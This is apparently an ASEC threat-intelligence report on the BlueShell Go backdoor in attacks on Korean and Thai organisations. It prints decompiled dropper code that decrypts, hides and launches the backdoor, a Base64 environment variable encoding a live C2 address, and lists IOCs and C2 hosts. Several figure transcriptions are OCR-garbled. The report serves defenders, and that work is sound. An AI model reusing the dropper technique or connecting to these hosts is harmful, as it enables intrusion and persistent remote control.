# BlueShell Used in APT Attacks Against Korean and Thai Targets

Assc asec.ahnlab.com/en/56941/

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BlueShell is a backdoor developed in Go. It is available on GitHub and supports Windows, Linux, and Mac operating systems. Currently, it seems the original GitHub repository has been deleted, but the BlueShell source code can be downloaded from other repositories. Notably, the ReadMe file containing the guidelines is in Chinese, and this suggests that the creator may be a Chinese speaker.

| -               | whitehatnote Update README.md   |  | @e6ab67 on Jun 13, 2020 🕥 3 commits     |
|-----------------|---|--|---|
|                 | key   |  | 3 years ago                             |
|                 | shell   |  | 3 years ago                             |
| D               | README.md   | Update README.md                                       | 3 years ago                             |
| ۵               | client.go   | Initial commit   | 3 years ago                             |
| ۵               | server.go   | Initial commit   | 3 years ago                             |
|                 | README.md   |  |   |
| B<br>الأ<br>الأ | BlueShell<br>BlueShell是一个跨平台的持续远控工员<br>向指定的C&C地址发起反弹连接尝试<br>用场景:  | ₹,拿下靶机后,根据操作系统版本下载部署<br>,在C&C端运行bsServer即可连接bsClient,从 | 时应的bsClient,其会每隔固定时间<br>而实现对靶机的持续控制,主要适 |
|                 | <ul> <li>红蓝对抗中的持久化后门或内网件</li> <li>社工钓鱼二次加载Payload</li> </ul>  | 代理   |   |
| Ē               | 目前支持的主要功能有:   |  |   |
|                 | <ul> <li>循环持续控制</li> <li>跨平台,支持Linux、Windows、</li> <li>交互式Shell反弹(Windows只支持</li> <li>Socks5代理反弹</li> <li>文件上传、下载</li> <li>TLS通信加密</li> </ul> | MacOS<br>侍普通反弹Shell)                                   |   |
| igur            | e 1. BlueShell published o  | n GitHub   |   |

There aren't many cases where BlueShell is known to have been used in the attacks unlike SparkRAT, Silver C2, or other malware published on GitHub. However, examining attack cases in Korea shows that a variety of threat actors are continuously using BlueShell in their attacks.

AhnLab Security Emergency response Center (ASEC) is monitoring APT attack cases using BlueShell. In this post, we will provide a summary of such cases. The attack cases that have been identified by AhnLab are mostly those that targeted Windows systems of Korean companies. However, attacks against Linux systems include cases where not only Korean but Thai broadcasting companies were also targeted.

# 1. BlueShell

One of the main characteristics of BlueShell is that it was developed in Go. Because of the many advantages of the Go language including the fact that it is easy to develop with and offers cross-platform support, it is used often to not only develop applications but also create malware. SparkRAT included in a Korean VPN installer [1] and Sliver C2 used in the attack campaign exploiting the vulnerability in Sunlogin, a Chinese remote control utility [2] are both malware developed in Go and published on GitHub. Besides these, there have been a growing number of cases where APT threat groups used Go to create malware; the Kimsuky threat group developed a downloader that installs Meterpreter, [3] the RedEyes (APT37) threat group developed a backdoor by abusing the Ably service, [4] and the Andariel threat group developed a variety of malware including 1th Troy reverse shell, Black RAT, Goat RAT, and Durian Beacon. [5]

In terms of features, BlueShell is a backdoor with a simple structure. It supports TLS encryption in communications with the C2 server and bypasses network detection. Features that can be run according to the commands from the threat actor include remote command execution, file download/upload, and Socks5 proxy.

#### **Command Feature**

| shell    | Run command   |
|----------|---------------|
| upload   | Upload file   |
| download | Download file |
| socks5   | Socks5 proxy  |

Table 1. Commands supported by BlueShell



Figure 2. Commands supported by BlueShell

BlueShell has three configuration data: the IP address of the C2 server, the port number, and the wait time. Ordinarily, these are hard-coded into the binary when the malware is created, and the init() function initializes the configuration data.



data used by BlueShell

## 2. Windows Version

#### 2.1. Attack Cases of the Dalbit Threat Group

The Dalbit group is a threat group based in China. The group usually targets vulnerable servers to breach information including internal data from companies or encrypts files and demands money. **[6]** Their targets of attack are usually Windows servers that are poorly managed or are not patched to the latest version. Besides these, there are also attack cases that targeted email servers or MS-SQL database servers.

The Dalbit group is known for using open-source tools in most stages of their attack from initial infiltration, privilege escalation, internal reconnaissance, to lateral movement, until their goals are achieved. The malware used in the actual command and control stages are also publicly available tools such as CobaltStrike, Metasploit, Ladaon, and BlueShell.

Out of the various attack cases, here, we will cover the case where BlueShell was collected during the attack process. While it has not been confirmed whether the threat actor used BlueShell in the actual attack, the BlueShell malware with the default C2 server set in the original source code was collected during the attack process. The collected files have x86 and x64 architectures. The source code information in the binary and the time they were collected by VirusTotal allows us to assume that these files were probably included in the collection of attack tools used by the threat actor.

/root/pentesttools/BlueShell/client.go

In attacks against web servers, the Dalbit threat group usually exploits the WebLogic or file upload vulnerability to upload web shells. Various JSP web shell files were also found in this attack case.



Figure 4. JSP web shells used in the attack

In the internal reconnaissance stage, the threat actor used the Lsass dump tool to steal account credentials and used the fscan tool to scan the internal network. It is presumed that the collected information would have been used for lateral movement using the Impacket tool.

The most prominent characteristic of the Dalbit group is that it uses Fast Reverse Proxy (FRP) as the proxy tool. In the attack process, the Frpc tool, its configuration file, and another proxy tool by the name of Venom [7] were used.



configuration file

#### 2.2. Attack Against a Korean Corporation

Although the case above was not one where BlueShell was used in its normal way in the attack process, a case of attack against a Korean corporation using BlueShell was later identified. Due to a lack of relevant information, the initial attack vector or whether the threat actor is the same one as the Dalbit group of the past could not be ascertained, but it is notable that BlueShell and Frpc were used together in the attack.

Examining the source code information in the binary shows that the threat actor likely created BlueShell in a Windows environment. Two versions of BlueShell were identified in the attack process; while both communicate with the same C2 server, one is obfuscated.

#### D:/skens/SK/BlueShell-master/client.go

The Frpc used in the attack is also obfuscated, and instead of being the default format of Frpc, it is a version customized by the threat actor. Ordinarily, Frpc reads and loads configuration data in file format, but the Frpc used in the attack decodes the encoded configuration data in the memory area during execution.

| 🚛 Dump 1      | 🚛 Du   | mp 2 | 2    | <b>1</b> | Dum  | р 3  | Q    | , Du | ımp  | 4  |     | Dur | np 5 | 13 | 🧐 V | Vatcl | h 1 | [x=] Locals   | 🐉 Stru | JCt |
|---------------|--------|------|------|----------|------|------|------|------|------|----|-----|-----|------|----|-----|-------|-----|---------------|--------|-----|
| Address       |        | He   | κ.   |          |      |      |      |      |      |    |     |     |      |    |     |       |     | ASCII         |        | 1   |
| 000000C0001   | 962FE  | 00   | 00   | 5B       | 63   | 6F   | 6D   | 6D   | 6F   | 6E | 5D  | 0A  | 09   | 73 | 65  | 72    | 76  | [common]      | serv   |     |
| 000000C0001   | 9630E  | 65   | 72   | 5F       | 61   | 64   | 64   | 72   | 20   | 3D | 20  | 6C  | 74   | 2E | 79  | 78    | 61  | er_addr =     | lt.yxa |     |
| 000000C0001   | 9631E  | 76   | 6B   | 62       | 2E   | 78   | 79   | 7A   | 0A   | 09 | 73  | 65  | 72   | 76 | 65  | 72    | 5F  | vkb.xyzs      | erver_ |     |
| 000000C0001   | 9632E  | 70   | 6F   | 72       | 74   | 20   | 3D   | 20   | 38   | 30 | 0A  | 09  | 70   | 72 | 6F  | 74    | 6F  | port = $80$ . | .proto | 1   |
| 000000c0001   | 9633E  | 63   | 6F   | 6C       | 20   | 3D   | 20   | 77   | 65   | 62 | 73  | 6F  | 63   | 6B | 65  | 74    | 09  | col = webs    | ocket. |     |
| 000000C0001   | 9634E  | 20   | 0A   | 09       | 5B   | 68   | 68   | 31   | 5D   | 0A | 09  | 74  | 79   | 70 | 65  | 20    | 3D  | [hh1]         | type = |     |
| 000000C0001   | 9635E  | 20   | 74   | 63       | 70   | 0A   | 09   | 70   | 6C   | 75 | 67  | 69  | 6E   | 20 | 3D  | 73    | 6F  | tcpplug       | in =so |     |
| 000000C0001   | 9636E  | 63   | 6B   | 73       | 35   | 0A   | 09   | 72   | 65   | 6D | 6F  | 74  | 65   | 5F | 70  | 6F    | 72  | cks5remo      | te_por |     |
| 000000c0001   | 9637E  | 74   | 20   | 3D       | 20   | 31   | 35   | 30   | 30   | 31 | 0A  | 09  | 70   | 6C | 75  | 67    | 69  | t = 15001.    | .plugi |     |
| 000000c0001   | 9638E  | 6E   | 5F   | 75       | 73   | 65   | 72   | 20   | 3D   | 20 | 68  | 65  | 6C   | 6C | 6F  | 0A    | 09  | $n_user = h$  | ello   |     |
| 000000c0001   | 9639E  | 70   | 6C   | 75       | 67   | 69   | 6E   | 5F   | 70   | 61 | 73  | 73  | 77   | 64 | 20  | 3D    | 20  | plugin_pas    | swd =  |     |
| 000000c0001   | 963AE  | 68   | 65   | 6C       | 6C   | 6F   | 0A   | 09   | 00   | 00 | 00  | 00  | 00   | 00 | 00  | 00    | 00  | hello         |        |     |
| 000000c0001   | 963BE  | 00   | 00   | 00       | 00   | 00   | 00   | 00   | 00   | 00 | 00  | 00  | 00   | 00 | 00  | 00    | 00  |               |        |     |
| Figure 6. Frp | oc con | figu | rati | on       | data | a in | clud | ded  | in f | he | bin | ary |      |    |     |       |     |               |        |     |

# 3. Linux Version

#### 3.1. Cases of Attack Presumed to Have Targeted Korea and Thailand

BlueShell, developed in Go, offers cross-platform support and thus can run not only in Windows environments but also in Linux systems. While monitoring BlueShell targeting Linux environments, ASEC identified customized types of BlueShell from VirusTotal. As they were uploaded to VirusTotal from Korea and Thailand, it seems that the two areas were the targets of attack.

The threat actor first created a dropper and used this to install BlueShell. The dropper is responsible for creating and executing BlueShell like ordinary droppers, but the difference here is that upon execution, an environment variable by the name "Igdt" is configured and executed. The created BlueShell finds the "Igdt" environment variable, decodes it, and uses it as the C2 server URL. Thus, BlueShell by itself cannot find the C2 server URL.

#### A. Analysis of the dropper

During the execution process, the dropper Xor-decrypts BlueShell saved in the internal .data section with the 0x63 key. The decrypted data is in compressed form, and it is decompressed and copied into the "/tmp/kthread" path.

```
fn unlink("/tmp/kthread");
mem tmp = fn malloc(0x6525A5LL);
mem unpacked = fn malloc(0xA89413LL);
memcpy(mem tmp, &unk 6A7A20, 0x21B737LL);
for ( j = 0; j < 0x21B737; ++j )
 mem_tmp[j] ^= 0x63u;
size = fn unpack(mem tmp, 0x21B737u, mem unpacked, 0xA89413u);
pFile = fn fopen("/tmp/kthread", "wb+");
if ( pFile )
                                                                                  Figure 7.
  fn fwrite(mem unpacked, size, 1LL, pFile);
 fn fclose(pFile);
if ( mem_tmp )
 fn munmap(mem tmp);
if ( mem unpacked )
 fn munmap(mem unpacked);
fn_setChmod("/tmp/kthread");
fn runWithEnv("/tmp/kthread", "/sbin/rpcd", "lgdt=MjAuMjE0LjIwMS4xNjYgNDQzIDE1",
return OLL;
```

The dropper's main routine

After "/tmp/kthread" (BlueShell malware) is executed, it deletes itself, so BlueShell only runs in the memory area. The dropper has two other characteristics. The first is that the argument "/sbin/rpcd" is transmitted when BlueShell is run and changes the name of the running process into "/sbin/rpcd" to disguise it. As such, the name of the disguised process is visible in the ps command or "/proc/[pid]/cmdline".



8. Changed process name

It is also notable that when the created BlueShell is run, the environment variable "lgdt" is configured before execution. Thus, the "lgdt" environment variable

"MjAuMjE0LjIwMS4xNjYgNDQzIDE1" is given as an argument for the sys\_execve system call, and the child process BlueShell executed accordingly also receives this environment variable.

| 00600000:0044cede<br>00000000:0044cedf<br>00000000:0044ce0<br>00000000:0044ce0<br>00000000:0044ceef<br>00000000:0044ceef  | 90<br>90<br>68 <u>36 00 00 00</u><br>0f 05<br>48 3d 00 f0 ff ff<br>77 02<br>f3 c3  | nop<br>nop<br>syscall<br>cmp - , ,-0x1000<br>ja 0x44cefl<br>ret | sys_exec   | Ve  |  |    |
|---|--|---|--|---|--|----|
| eax = 0x00000000  |  |   |  |   |  |    |
| Data Dump   |  |   | × Stack  |   |  |    |
| 0x000000001346000-0           0000000001346000-0           0000000001347920         4d         0f         87         5d           00000000001347940         ec         0f         87         5d           00000000001347940         ec         0f         87         5d           00000000001347950         06         00         06         00         06 | ft         7f         00         00         69         0f         87           ft         7f         00         00         69         0f         87           ft         7f         00         00         0f         0f         87           ft         7f         00         00         00         10         87           ob         00         00         00         00         10         00         00           ob         00         00         00         00         00         00         00         00           ob         00         00         00         00         00         00         00         00         00 | 0<br>5d ff 7f 00 00 M   | 00007fff<br>00007fff<br>00007fff<br>00007fff<br>00007fff<br>00007fff<br>00007ff<br>00007ff | 1-53657a90         0000000000000000000           53667a90         000000000000000000           53667a90         000000000000000000           53657a90         0000000000000000000           53657a90         000000000000000000000000000000000000 | return to 0x0000000000000000000000000000000000 | 1- |

Figure 9. Igdt environment variable transmitted upon execution

#### B. Analysis of customized BlueShell

The BlueShells used in the attacks have the same features aside from a few notable points. Instead of having configuration data such as the C2 server URL or the port number in the binary, a certain environment variable is read and decrypted to obtain said data. In the case above, the dropper configured the environment variable "Igdt" before executing BlueShell, and therefore the environment variable was inherited. BlueShell decodes the environment variable "Igdt" with Base64 and uses this as configuration data.

|      |   | *                             |
|------|---|-------------------------------|
| M 🔬  |   | 🗾 🚄 🖼                         |
| sub  | rsp, 78h  |                               |
| mov  | [rsp+78h+var_8], rbp                                | loc_5C4529:                   |
| lea  | rbp, [rsp+78h+var_8]                                | call runtime_morestack_noctxt |
| lea  | rax, aLgdt ; "lgdt"                                 | jmp main_init_0               |
| mov  | ebx, 4  | <pre>main_init_0 endp</pre>   |
| call | os_Getenv   |                               |
| mov  | rcx, cs:qword_789818                                |                               |
| mov  | rdx, rax  |                               |
| mov  | rax, rcx  |                               |
| mov  | rsi, rbx  |                               |
| mov  | rbx, rdx  |                               |
| mov  | rcx, rsi  |                               |
| nop  |   |                               |
| call | <pre>encoding_base64ptr_Encoding_DecodeString</pre> |                               |
| mov  | [rsp+78h+var_18], rax                               |                               |
| mov  | [rsp+78h+var_30], rbx                               |                               |
| nop  |   |                               |
| call | os_hostname   |                               |
| mov  | [rsp+78h+var_20], rax                               |                               |
| mov  | [rsp+78h+var_38], rbx                               |                               |
| mov  | <pre>rcx, [rsp+78h+var_30]</pre>                    |                               |
| xor  | eax, eax  |                               |
| mov  | rbx, [rsp+78h+var_18]                               |                               |
| call | runtime_slicebytetostring                           |                               |
| call | strings_Fields                                      |                               |
| cmp  | rbx, 3  |                               |
| jl   | loc 5C4514  |                               |

Figure 10. Routine that decrypts environment variables and uses them as configuration data In the attack case in Korea covered above, three arguments are found after decoding with Base64. These are the C2 server URL, port number, and wait time.

#### Decrypted environment variable: 20.214.201[.]166 443 15

The BlueShell uploaded from Thailand is created in the path "/tmp/.ICECache". When the environment variable is decoded, four pieces of data can be identified. The values are the same for up to the third configuration data. The fourth is used to distinguish between infected systems. The customized BlueShell uses the hostname() function to obtain the host name of the currently running system and runs only when this value matches the fourth data.

It is difficult to pinpoint the attack targets using only the host name of the infected system, but the host name of the decoded string is the same as one of the broadcasting companies in Thailand. The country that uploaded to VirusTotal and the malware's conditions for infected systems show that this threat group possibly launched an APT attack against targets in Thailand.

lgdt=MjAyLjg3LjIyMy4xMjQgNDQzIDUgU01DTUNTVUZTUDAxLkNINy5DT00=

Figure 11. The

202.87.223.124 443 5 SMC--- 7.COM

Argument Description

encoded environment variable and the result after decoding it

| Ŭ  | •                               |
|----|---------------------------------|
| #1 | C2 server address               |
| #2 | C2 server port number           |
| #3 | Wait time                       |
| #4 | Environmental conditions to run |

 Table 2. Configuration data of the customized BlueShell

Additionally, the BlueShells used in attack cases in both Korea and Thailand were built in the Go language environment version 1.18.4. Through the following source code information, it can be inferred that attacks would have been ongoing from at least September 2022.

| Location of<br>Upload to<br>VirusTotal | Time of<br>Upload to<br>VirusTotal | Source                                     | Go<br>Version |
|--|------------------------------------|--|---------------|
| Thailand                               | 2022-09-01<br>02:51:45 UTC         | /home/User/Desktop/client/main.go          | 1.18.4        |
| Republic of<br>Korea                   | 2023-02-08<br>15:47:26 UTC         | /home/User/Desktop/20221209/client/main.go | 1.18.4        |
| Republic of<br>Korea                   | 2023-03-07<br>05:11:53 UTC         | /home/User/Desktop/20230202/client/main.go | 1.18.4        |

# 4. Conclusion

Being a backdoor, BlueShell can receive commands from the threat actor to perform actions in the infected system, such as command execution, file download/upload, and Socks5 proxy. As it is developed in Go, Linux environments can also become targets of attack along with Windows environments. Various threat actors are using it in attacks because it is available on GitHub as an open source.

To prevent such security threats, vulnerable settings must be reviewed, relevant systems must always be kept upgraded to the latest version to protect them against attacks. Also, V3 should be updated to the latest version so that malware infection can be prevented.

#### **File Detection**

- WebShell/JSP.Chopper.SC183868 (2022.10.15.01)
- WebShell/JSP.Godzilla.S1719 (2021.12.03.00)
- WebShell/JSP.Generic.S1363 (2021.01.27.03)
- Backdoor/Win.BlueShell.C5272202 (2022.10.05.00)
- Trojan/Win.BlueShell.C5280704 (2022.10.15.01)
- Trojan/Win.ReverseShell.C5417728 (2023.04.25.00)
- Trojan/Win.ReverseShell.C5417729 (2023.04.25.00)
- Trojan/Win.FRP.C5417731 (2023.04.25.00)
- HackTool/Win.Frpc.R543073 (2022.12.21.03)
- HackTool/Win.Frpc.R543073 (2022.12.21.03)
- HackTool/Script.Frpc (2022.12.17.00)
- HackTool/Win.Fscan.C5230904 (2022.10.08.00)
- HackTool/Win.Fscan.C5272189 (2022.10.05.00)
- HackTool/Win.Lsassdump.R524859 (2022.10.05.00)
- HackTool/Win.ProxyVenom.C5280699 (2022.10.15.01)
- HackTool/Win.impacket.C4777703 (2021.11.19.03)
- Dropper/Linux.BlueShell.2904696 (2023.09.04.02)
- Dropper/Linux.BlueShell.2888120 (2023.09.04.02)
- Trojan/Linux.BlueShell.XE216 (2023.02.20.03)

## IOC

#### MD5

- 53271b2ab6c327a68e78a7c0bf9f4044: BlueShell - Dalbit (searchapp.exe, bsClient-Win-x32.exe)

- 011cedd9932207ee5539895e2a1ed60a: BlueShell - Dalbit (bsC.exe, bsClient-Winamd64.exe)

- 7d9c233b8c9e3f0ea290d2b84593c842: Frpc - Dalbit (dllhost.exe)

- 31c4a3f16baa5e0437fdd4603987b812: Frpc Dalbit (server.exe)
- 9f55b31c66a01953c17eea6ace66f636: Frpc Config Dalbit (config)
- 33129e959221bf9d5211710747fddabe: Frpc Config Dalbit (config)
- e0f4afe374d75608d604fbf108eac64f : ProxyVenom (agent.exe, kernel.exe)
- 96ec8798bba011d5be952e0e6398795d : Impacket (secretsdump.exe)
- b434df66d0dd15c2f5e5b2975f2cfbe2 : Lsass Dump (dump.exe)
- f4ace89337c8448f13d6eb538a79ce30 : fscan (rdp.exe)
- 5e0845a9f08c1cfc7966824758b6953a : fscan (fscan64.exe)
- e981219f6ba673e977c5c1771f86b189 : WebShell (shell.jsp)
- 85a6e4448f4e5be1aa135861a2c35d35 : WebShell (temp.jsp)
- 21c7b2e6e0fb603c5fdd33781ac84b8f : WebShell (update.jsp)
- 1a0c704611395b53f632d4f6119ed20c : BlueShell Attack case in Korea (hh64.exe)
- 4eb724cc5f3d94510ba5fc8d4dba6bb6: BlueShell Attack case in Korea (hh64.exe)
- 47fc0ecb87c1296b860b2e10d119fc6c: Frpc Attack case in Korea (svchosts.exe)
- 2ed0a868520c31e27e69a0ab1a4e690d: Dropper Uploaded from Korea (tmp, rpcd)
- 985000d076e7720660ab8435639d5ad5: BlueShell Uploaded from Korea (exe)
- 425c761a125b7cb674887121312bd16c: BlueShell Uploaded from Korea (/tmp/kthread)
- 3f022d65129238c2d34e41deba3e24d3: Dropper Uploaded from Thailand (orbds)
- 30fe6a0ba1d77e05a19d87fcf99e7ca5: BlueShell Uploaded from Thailand (/tmp/.ICECache)

# C&C

- aa.zxcss[.]com:443: Frpc Dalbit
- 121.127.241[.]117:20001: BlueShell Attack case in Korea
- It.yxavkb[.]xyz:80 Frpc Attack case in Korea
- 20.214.201[.]166:443: BlueShell Uploaded from Korea
- 202.87.223[.]124:443: BlueShell Uploaded from Thailand

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